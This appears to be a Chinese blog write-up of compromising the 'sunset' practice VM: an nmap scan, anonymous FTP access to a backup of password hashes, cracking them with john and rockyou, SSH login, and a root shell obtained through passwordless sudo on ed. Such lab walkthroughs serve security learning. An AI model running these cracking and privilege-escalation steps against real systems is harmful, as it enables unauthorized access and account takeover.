sunset靶机渗透实战
2019-08-02 本文已影响98人
城市烈人
sunset靶机渗透,该靶机就是纯主机渗透,比较简单,适合新手练习
本垃圾现在转向工控安全领域继续学习,后续将推出团队或者个人的公众号,希望大家关注
靶机IP:192.168.56.101
信息收集
nmap全扫
nmap -sS -Pn -A -p- -n 192.168.56.101

就只有21和22两个端口服务开发,21的FTP还能匿名登录,上去看看
匿名登录FTP
ftp 192.168.56.101
anonymous

发现一个备份文件backup,down下来看看

CREDENTIALS:
office:$6$$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.
datacenter:$6$$3QW/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/
sky:$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/
这些都是证书,直接上john解一下
john解
将上述的hash保存为sunset,直接一起john解
john sunset
john解了好久,干脆跑字典
john --wordlist=rockyou.txt sunset

最后密码为:cheer14
登录提权
ssh sunset@192.168.56.101
cheer14

登录上去后,发现了 user.txt
5b5b8e9b01ef27a1cc0a2d5fa87d7190
不知道什么东西,解不出啦
查看下权限
sudo -l

发现有root权限免密执行/usr/bin/ed,用来提权
提权
执行试试
sudo /usr/bin/ed
并没有什么
查看下可执行的二进制文件并没有什么发现

随手试了试
sudo /usr/bin/ed
!/bin/bash

直接拿到root权限
直接拿flag

25d7ce0ee3cbf71efbac61f85d0c14fe
靶机百度云下载
链接:https://pan.baidu.com/s/1fjlXw2JoSKRjBWcqhWQ11A
提取码:anr0